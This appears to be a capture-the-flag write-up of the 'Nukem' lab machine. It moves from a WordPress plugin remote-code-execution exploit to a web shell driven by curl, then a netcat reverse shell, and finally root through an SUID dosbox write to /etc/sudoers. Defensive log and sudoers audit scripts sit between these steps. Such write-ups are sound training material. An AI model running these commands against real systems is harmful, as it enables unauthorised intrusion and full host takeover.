Machine Information
- Machine Name: Nukem
- Machine Difficulty: intermediate
Information Gathering
Classic nmap time
Nmap scan report for 192.168.155.105
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-24 11:40:56 +08 for 171s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIa7leEeVssjdrJAMl1xs+qCC7DvEgvhDmYxn7oFKkzQdWQXNwPDaf19b+8uxImEAQ3uRXYg56MItfQ54pTuDpJSuuSfCXyqH9/o5S+gugCgkGiWRTlyXAmCe4uM4ZZD09yChsJ0LdPKvqM19l5o+8KCBuXAGOX7Co60oUpD3+xINAS/XQYFdY1RARpIsuzd3qUH
keKJvGp2hbI6b2bgfcjTcPgBaLKLMa6OZ208whcHdYwJdOnc2m3mi2o9v+ETK+P8exJ1/DTIYLLVlo0BPMqlCE2R4JyEfp8RQeggq42yHOMmBI6pQ/BhClgheiPDhF+hQLNafLgkLeHv625eFq7V8bwi2Uy7/NV8jip1FobFhaT2L/MiRHnx7my4Cxk0BzoAvj0fOzOXouT5rMon6o14x/HTQBqORFhLvTNkCnPE0nen
8ohQ05R0oWFiVwH74OaLHvwmzUuy8d1Wln5rW26q+UjZy1AIGpRHvyfEV5dzmB0ujnrE8Io702tIb/ssM=
| 256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLFrQmyRArhVBZ7HJi6W3YN/7sFuTBg5RLoffgVyCRaVpqj/VAwL3c85iE7s1x61oRu7CiVIvzOcYAMh5BfOjuI=
| 256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMWYiSpSV5PFfFK8fw7UZ1MAMHej2xBONdUi5CSr7huF
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-generator: WordPress 5.5.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Retro Gamming – Just another WordPress site
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
3306/tcp open mysql? syn-ack ttl 61
| fingerprint-strings:
| NULL, NessusTPv11, OfficeScan, SIPOptions, X11Probe, adbConnect, beast2, couchbase-data, giop, gkrellm, mongodb, pervasive-btrieve, redis-server:
|_ Host '192.168.45.195' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.45.195' is not allowed to connect to this MariaDB server
5000/tcp open http syn-ack ttl 61 Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: 404 Not Found
|_http-server-header: Werkzeug/1.0.1 Python/3.8.5
13000/tcp open http syn-ack ttl 61 nginx 1.18.0
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Login V14
|_http-server-header: nginx/1.18.0
36445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.6.2
As usual, I started by exploring web ports.
Port 80
According to the nmap result, it's a WordPress site. I then used wpscan to check whether it has any vulnerable plugins.
wpscan --url http://192.168.155.105 -e p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.155.105/ [192.168.155.105]
[+] Started: Thu Oct 24 15:14:16 2024
...
[i] Plugin(s) Identified:
[+] simple-file-list
| Location: http://192.168.155.105/wp-content/plugins/simple-file-list/
| Last Updated: 2024-10-19T15:39:00.000Z
| [!] The version is out of date, the latest version is 6.1.13
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.2.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/simple-file-list/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/simple-file-list/readme.txt
[+] tutor
| Location: http://192.168.155.105/wp-content/plugins/tutor/
| Last Updated: 2024-09-19T06:24:00.000Z
| [!] The version is out of date, the latest version is 2.7.6
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.5.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/tutor/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/tutor/readme.txt
...
I noticed that two of the plugins found were outdated. I then checked searchsploit to see whether there was any existing exploit for these plugins.
searchsploit simple file list
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Joomla! Component mod_simpleFileLister 1.0 - Directory Traversal | php/webapps/17736.txt
Simple Directory Listing 2 - Cross-Site Arbitrary File Upload | php/webapps/7383.txt
WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload | php/webapps/48979.py
WordPress Plugin Simple File List 4.2.2 - Remote Code Execution | php/webapps/48449.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
I then tried the remote code execution exploit, as it seemed more interesting.
python 48449.py http://192.168.155.105
[ ] File 842.png generated with password: c0a15feddbdb865194b18ea4af06a9da
[ ] File uploaded at http://192.168.155.105/wp-content/uploads/simple-file-list/842.png
[ ] File moved to http://192.168.155.105/wp-content/uploads/simple-file-list/842.php
[+] Exploit seem to work.
[*] Confirmning ...
[+] Exploit work !
URL: http://192.168.155.105/wp-content/uploads/simple-file-list/842.php
Password: c0a15feddbdb865194b18ea4af06a9da
Once this was done, I could execute commands through the URL.
curl -X POST http://192.168.155.105/wp-content/uploads/simple-file-list/842.php -d 'password=c0a15feddbdb865194b18ea4af06a9da&cmd=system("whoami;id");'
http
uid=33(http) gid=33(http) groups=33(http)
Now that I could execute commands, it was time to get a reverse shell.
nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.155.105] 42870
bash: cannot set terminal process group (350): Inappropriate ioctl for device
bash: no job control in this shell
[http@nukem simple-file-list]$ whoami
whoami
http
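As an added defender-side example (my code, not part of the original writeup), the following Python scans Apache access-log lines for scripts being requested under the WordPress uploads directory, which is the trace the upload-and-rename above leaves behind. The log lines are constructed samples that reuse the lab addresses from this writeup.

```python
import re
from typing import List, Tuple

# Apache "combined" log format: ip - - [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Executable extensions that should never be served from uploads/.
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar)(\?|$)', re.IGNORECASE)
UPLOADS = "/wp-content/uploads/"

def find_upload_exec(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (ip, method, path) for every request that targets a script
    under the uploads directory. Successful POSTs are the strongest signal:
    that is how the web shell in this writeup receives its commands."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the parser
        path = m.group("path")
        if path.startswith(UPLOADS) and EXEC_EXT.search(path):
            hits.append((m.group("ip"), m.group("method"), path.split("?")[0]))
    return hits

# Constructed sample log lines (not a real capture from the machine).
SAMPLE_LOG = [
    '192.168.45.195 - - [24/Oct/2024:15:30:01 +0800] "GET /wp-content/uploads/2024/10/cover.png HTTP/1.1" 200 5123',
    '192.168.45.195 - - [24/Oct/2024:15:30:02 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 88',
    '192.168.45.195 - - [24/Oct/2024:15:30:03 +0800] "GET /wp-content/uploads/simple-file-list/842.php HTTP/1.1" 200 12',
    '192.168.45.195 - - [24/Oct/2024:15:30:04 +0800] "POST /wp-content/uploads/simple-file-list/842.php HTTP/1.1" 200 54',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, method, path in find_upload_exec(SAMPLE_LOG):
        print(f"ALERT {ip} {method} {path}")
```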
Now that I had a shell but not root, it was time for privilege escalation.
Privilege Escalation
I always start out with linpeas.sh since this is a Linux machine.
[http@nukem simple-file-list]$ find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chage
/usr/bin/dosbox
/usr/bin/newgrp
I noticed that dosbox was highlighted by linpeas.sh, which means there's a high chance I could abuse it to escalate to root. I then checked GTFOBins to see what the privilege escalation method is.
sudo install -m =xs $(which dosbox) .
LFILE='\path\to\file_to_write'
./dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit
According to the explanation, I could perform file reads and file writes with this dosbox binary. I then tried writing to /etc/sudoers to allow everyone to run every command as root.
[http@nukem simple-file-list]$ dosbox -c 'mount c /' -c "echo ALL ALL=(ALL) NOPASSWD: ALL >> c:/etc/sudoers" -c exit
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:/etc/sudoers
Once it was written to the file, I ran sudo -l to see which sudo commands I could run.
[http@nukem simple-file-list]$ sudo -l
Runas and Command-specific defaults for http:
Defaults!/etc/ctdb/statd-callout !requiretty
User http may run the following commands on nukem:
(ALL) NOPASSWD: ALL
Now I could easily get a root shell.
[http@nukem simple-file-list]$ sudo su root
[root@nukem simple-file-list]# whoami
root
That's how I got the root user ~
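An added audit example (my code, not from the writeup or GTFOBins): it diffs the output of find / -perm -u=s against an assumed baseline of expected SUID binaries and flags sudoers rules that grant NOPASSWD ALL, the two conditions this box was rooted through. The baseline set and the sample sudoers content are assumptions constructed from the output above.

```python
import re
from typing import List, Set

# Assumed baseline of SUID binaries expected on this host; in practice this
# comes from a known-good image. Anything outside it is a finding.
EXPECTED_SUID: Set[str] = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/chage",
    "/usr/bin/newgrp",
}

# One sudoers user rule: <user|%group|ALL> <host>=(<runas>) [TAG:] <commands>
RULE_RE = re.compile(r'^(?P<who>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*'
                     r'(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+?)\s*$')

def unexpected_suid(find_output: str) -> List[str]:
    """Diff the output of `find / -perm -u=s` against the baseline."""
    paths = {p.strip() for p in find_output.splitlines() if p.strip()}
    return sorted(paths - EXPECTED_SUID)

def risky_sudoers_rules(sudoers: str) -> List[str]:
    """Return user rules that allow ALL commands with NOPASSWD.
    Only plain rules are parsed; aliases and #include lines are out of scope."""
    findings = []
    for raw in sudoers.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m and "NOPASSWD" in m.group("tags") and m.group("cmds") == "ALL":
            findings.append(line)
    return findings

# Constructed samples based on the writeup's output.
SAMPLE_FIND = "/usr/lib/dbus-1.0/dbus-daemon-launch-helper\n/usr/bin/chage\n" \
              "/usr/bin/dosbox\n/usr/bin/newgrp\n"
SAMPLE_SUDOERS = """Defaults!/etc/ctdb/statd-callout !requiretty
root ALL=(ALL) ALL
%wheel ALL=(ALL) ALL
ALL ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SAMPLE_FIND))
    print("risky sudoers rules:", risky_sudoers_rules(SAMPLE_SUDOERS))
```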
Things I learned from this machine
- Try to use wpscan more and check for outdated plugins.
- The exploit uses a password with a POST request, which is new to me.
- dosbox privilege escalation can write a file into /etc/sudoers or /etc/passwd.
- There's a part where I saw others' writeups and realised I missed the .vnc folder, from which I could have downloaded the passwd file and got an RDP session using vncviewer.